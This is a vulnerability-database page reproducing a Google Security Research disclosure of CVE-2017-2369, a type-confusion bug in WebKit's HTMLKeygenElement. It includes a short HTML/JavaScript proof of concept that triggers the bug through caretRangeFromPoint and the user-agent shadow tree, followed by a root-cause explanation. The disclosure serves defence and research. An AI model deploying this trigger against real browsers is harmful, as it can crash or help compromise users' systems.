Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2017-2369

Publish Date: 01 Feb 2017

Author: Google Security Research, ifratric

Source

                							

                Apple WebKit: Type confusion in HTMLKeygenElement 

CVE-2017-2369


PoC:

&lt;keygen id="keygen_element" style="position:absolute; height: 100px; width: 100px;"&gt;
&lt;script&gt;
var range = document.caretRangeFromPoint(50, 50);
var shadow_tree_container = range.commonAncestorContainer;
shadow_tree_container.prepend("foo");
keygen_element.disabled = true;
&lt;/script&gt;

What happens here:
1. caretRangeFromPoint() allows accessing (and modifying) userAgentShadowRoot from JavaScript
2. HTMLKeygenElement::shadowSelect() blindly casts the first child of the userAgentShadowRoot to HTMLSelectElement without checking the Node type.


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: ifratric

<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Apple WebKit HTMLKeygenElement Type Confusion

Vulmon Search

About

Products

Connect